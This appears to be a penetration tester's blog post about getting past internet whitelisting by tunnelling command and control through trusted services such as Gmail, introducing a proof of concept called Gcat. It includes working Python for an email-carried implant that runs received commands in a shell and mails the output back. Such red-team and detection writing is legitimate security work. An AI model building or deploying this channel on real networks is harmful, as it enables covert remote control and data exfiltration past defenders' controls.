Benjamin Donnelly //
When simple bind shells don’t work, a reverse shell is the way to go. But what happens when computer network defense teams get wise and start deploying defenses against even that simple workaround?
The never-ending game of cat and mouse that is computer network defense lends itself to a continual arms race between attacker and defender. The defenders up their game and completely remove a previous attack vector. The adversary counters by finding a new way to escalate. The entire history of computer network operations is defined by this dynamic. One domain in which the effect is easy to see, and the subject of this post, is the escalation over C2 (command and control, data exfiltration, covert channels).
With lax firewall rules, remote code execution can quickly lead to a shell bound to a listening port on the victim machine. Once the defenders deploy a simple default deny for incoming connections on all ports (other than those specifically excluded from the rule), a bind shell becomes nigh infeasible. The solution is not some convoluted workaround: it is a reverse shell, which phones home from the victim to the attacker.
There are a number of additional mitigating steps that defenders can take between that point and whitelisting, but whitelisting is what I want to talk about. With internet blacklisting, it is not unfair to say that even a massive block list still allows traffic out to 99.99 percent of the internet.
I was once working on a test against a target with extensive and highly sensitive internet blacklisting. We were purposefully triggering the alarms as part of a command and control/data exfiltration test. Every time I would trigger an alarm, the IP of the jump box from which I was operating would be blacklisted. This would at first glance appear to be a somewhat decent defense. Certainly it is better than the majority of internal networks I’ve encountered, where literally nothing happens when an alarm is triggered (if there are any alarms at all). But the bypass for me could not have been simpler. Grabbing a new IP address for my jump box was nothing more than a minute-long process, and just like that, I was back in the network.

The problem with internet blacklisting is that it simply cannot stop even a slightly sophisticated adversary: I change my signature slightly and re-attack. That is why internet whitelisting is the preferred recommendation for highly security-conscious companies. With whitelisting, you block all but the explicitly allowed internet resources. The immediate objection is the fear of the chill it will put on company productivity: if everything on the internet is blocked, how can anyone get any work done? The solution is simple. An alert IT team takes requests for sites to be added to the whitelist on an ongoing basis. If an employee needs access to YouTube, they send a quick request to the team, the team approves it, and in a minute or two YouTube is available to all users. The difference is that an attacker can no longer just permute their signature to slip past a block list. Whitelisting keeps the 99.99 percent of the internet out and lets in only what you keep eyes on. This is a far better solution, but as you might imagine, it is not foolproof.
Certainly, there is more than one way to bypass even well-orchestrated implementations of internet whitelisting. For starters, a lax approval process can lead to malicious sites being placed on the list. In defense of the process, even in that eventuality it is far easier to remove a dangerous entry from a whitelist than it is to continually block a mutating adversary via blacklists.
My favorite bypass technique, however, is something far more low profile. As an attacker, if I want to command systems on, or extract data from, a target network, all I need is a pipe through which I can send information in and out. Even with internet whitelisting, plenty of sites on the whitelist are perfectly capable of piping information through the network. Unfortunately for the defenders, these sites will likely be highly trusted and allowed to communicate with company systems with very little oversight. All you need to do as an attacker is find a way to piggyback on an already trusted communication channel.
This is why I wrote the POC (proof of concept) Gcat. Just like Netcat, Gcat pipes raw data from a client to a server, and it can also drop into a command shell. The biggest difference is the transport: where Netcat opens a direct TCP connection between attacker and victim, Gcat encapsulates its communications in email messages sent and received through Gmail. It literally emails in and out of the network. You might imagine that even on an exceptionally secure network with top-of-the-line whitelisting, Gmail is going to be one of the first services to be whitelisted. In terms of “threats”, Google is not something that should be blacklisted; it is one of the web’s greatest portals to productivity. And unfortunately for defenders, most security teams simply don’t think of this type of threat: piggybacking on legitimate services in order to bypass a whitelist.
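To make that transport concrete, here is an added example that is not Gcat’s own code and does not reproduce its message format: a minimal operator/implant pair that wraps commands and their output in RFC 5322 messages with base64 bodies and exchanges them through one shared mailbox, the way a mail-tunnelled shell does. The `FakeMailbox`, the `[gcat-demo]` subject tag and the `X-Job-Id` header are assumptions made so the demo runs offline; in a real implant the mailbox would be `imaplib`/`smtplib` sessions to the mail provider.

```python
"""Added example: a Netcat-style command channel carried inside email.

Not Gcat's code. The mailbox, subject tag and job-id header are assumptions
chosen so the whole exchange runs offline in one process.
"""
import base64
import subprocess
import uuid
from collections import deque
from email import message_from_string, policy
from email.message import EmailMessage

TAG = "[gcat-demo]"  # assumed subject marker; Gcat's real tags are not reproduced


class FakeMailbox:
    """In-memory stand-in for one shared mail account (assumption).

    Both sides read and write the same inbox and pick out their own traffic by
    subject, exactly as they would with IMAP searches against a real account.
    """

    def __init__(self):
        self.inbox = deque()
        self.sent_log = []  # every raw message ever sent, for inspection

    def send(self, raw):
        self.inbox.append(raw)
        self.sent_log.append(raw)

    def fetch(self, kind):
        """Remove and return raw messages whose subject is '<TAG> <kind>'."""
        wanted, keep = [], deque()
        for raw in self.inbox:
            msg = message_from_string(raw, policy=policy.default)
            (wanted if msg["Subject"] == f"{TAG} {kind}" else keep).append(raw)
        self.inbox = keep
        return wanted


def build_message(sender, recipient, kind, job_id, payload):
    """Wrap an arbitrary byte payload as an RFC 5322 message with a base64 body."""
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = recipient
    msg["Subject"] = f"{TAG} {kind}"
    msg["X-Job-Id"] = job_id  # assumed custom header tying output to its command
    msg.set_content(base64.b64encode(payload).decode("ascii"))
    return msg.as_string()


def parse_message(raw):
    """Return (job_id, payload bytes) from a message built by build_message."""
    msg = message_from_string(raw, policy=policy.default)
    return str(msg["X-Job-Id"]), base64.b64decode(msg.get_content().strip())


class Operator:
    """Attacker side: queue a command as mail, read the output mail back."""

    def __init__(self, mailbox, me, implant_addr):
        self.mailbox, self.me, self.implant_addr = mailbox, me, implant_addr

    def send_command(self, cmd):
        job_id = uuid.uuid4().hex
        raw = build_message(self.me, self.implant_addr, "cmd", job_id, cmd.encode())
        self.mailbox.send(raw)
        return job_id

    def collect_results(self):
        """Map job id -> decoded output for every 'out' message waiting."""
        return {job: out.decode(errors="replace")
                for job, out in map(parse_message, self.mailbox.fetch("out"))}


class Implant:
    """Victim side: poll the mailbox, run each command, mail the output back."""

    def __init__(self, mailbox, me, operator_addr, timeout=30):
        self.mailbox, self.me, self.operator_addr = mailbox, me, operator_addr
        self.timeout = timeout

    def run(self, cmd):
        # shell=True on purpose: this is the "drop into a command shell" behaviour
        proc = subprocess.run(cmd, shell=True, capture_output=True, timeout=self.timeout)
        return proc.stdout + proc.stderr

    def poll_once(self):
        """One polling cycle; returns how many commands were handled."""
        handled = 0
        for raw in self.mailbox.fetch("cmd"):
            job_id, cmd = parse_message(raw)
            output = self.run(cmd.decode())
            self.mailbox.send(build_message(self.me, self.operator_addr, "out", job_id, output))
            handled += 1
        return handled


def demo(cmd="echo hello"):
    """Full round trip: operator mails a command, implant mails the output back."""
    mb = FakeMailbox()
    op = Operator(mb, "operator@example.com", "implant@example.com")
    bot = Implant(mb, "implant@example.com", "operator@example.com")
    job = op.send_command(cmd)
    bot.poll_once()
    return job, op.collect_results(), mb.sent_log


if __name__ == "__main__":
    job, results, log = demo()
    print(results[job])
```

Running it, the implant executes `echo hello` and the operator reads the result out of the same mailbox. From the defender’s side the point is that `sent_log` contains nothing an egress whitelist can act on: two ordinary base64-bodied emails to a trusted provider. What remains observable is the implant’s polling cadence against the mail service and the unusual subject tag, which is where any detection of this channel has to start.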
There is certainly one saving grace: not many adversaries actually reach this level of sophistication, at least not in a run-of-the-mill attack. Internet cyber crime is far more ready to play the part of a hungry predator, picking on only the weak and wounded and ignoring the large, lucrative targets that look difficult. But statistical effects are no excuse when it comes to securing our nation’s infrastructure. We must be ready for any threat, not just the most typical.
And so I present for your consideration Gcat, a proof-of-concept Netcat over Gmail.
This small POC has also been ported to PowerShell for ease of use on Windows machines, and it has since been updated and turned into something more than just a POC.